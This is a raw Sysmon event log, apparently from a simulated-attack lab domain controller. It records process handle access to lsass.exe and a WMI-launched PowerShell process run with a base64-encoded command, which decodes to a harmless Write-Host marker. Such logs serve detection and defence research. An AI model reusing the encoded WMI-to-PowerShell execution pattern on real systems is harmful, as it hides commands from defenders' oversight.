16:52:51.606{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.606{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.608{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EC VwByAGkAdABlAC0ASABvAHMAdAAgADgANAA2ADIAYwBhAGIAYwAtAGQANQA3ADEALQA0ADQAZAA0AC0AYQAwAGIANgAtAGEAOQBiAGQAZAA4ADYAMAAzADUAYwAwAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002236288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.590{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.590{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.572{05ADC7E1-229F-6039-1600-00000000AD01}154014124C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.559{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.543{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.543{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.519{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.519{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.517{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002236279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:41.133{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-64197-true2001:7fd:0:0:0:0:0:1k.root-servers.net53domain 354300x80000000000000002236278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:40.915{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60129-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002236277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:40.915{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60129-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 10341000x80000000000000002237671Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237670Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237669Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237668Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.997{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237667Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237666Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237665Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237664Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237663Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.974{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237662Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 